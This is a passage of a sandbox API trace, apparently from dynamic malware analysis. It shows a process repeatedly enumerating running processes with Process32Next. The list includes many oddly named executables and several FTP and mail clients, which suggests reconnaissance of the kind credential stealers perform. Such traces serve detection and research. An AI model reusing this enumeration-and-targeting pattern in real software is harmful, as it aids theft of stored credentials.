| out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0188.507] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0188.508] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.510] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.512] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0188.514] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.516] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.517] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0188.519] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0188.521] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0188.522] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0188.524] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0188.526] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.527] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0188.571] CloseHandle (hObject=0x17ec) returned 1 [0188.571] Sleep (dwMilliseconds=0x64) [0188.581] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0188.633] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.635] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.636] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.646] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.647] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.649] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.650] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.652] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.653] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.655] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.656] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.658] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.696] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.735] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.737] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.738] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.740] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.741] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.743] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.744] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.746] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0188.747] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x33, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.749] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0188.750] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.754] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0188.756] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0188.758] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0188.759] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0188.761] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0188.762] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0188.764] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.765] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.766] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0188.768] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.788] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.812] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.814] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0188.815] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0188.817] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0188.818] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0188.820] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0188.821] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0188.823] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0188.824] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0188.826] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0188.827] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0188.829] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0188.830] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0188.832] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0188.836] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0188.838] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0188.840] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0188.841] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0188.843] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0188.844] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0188.846] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0188.888] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0188.889] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0188.891] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0188.893] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0188.895] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0188.897] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0188.899] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0188.901] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0188.903] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0188.905] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0188.907] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0188.909] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0188.911] Process32Next (in: 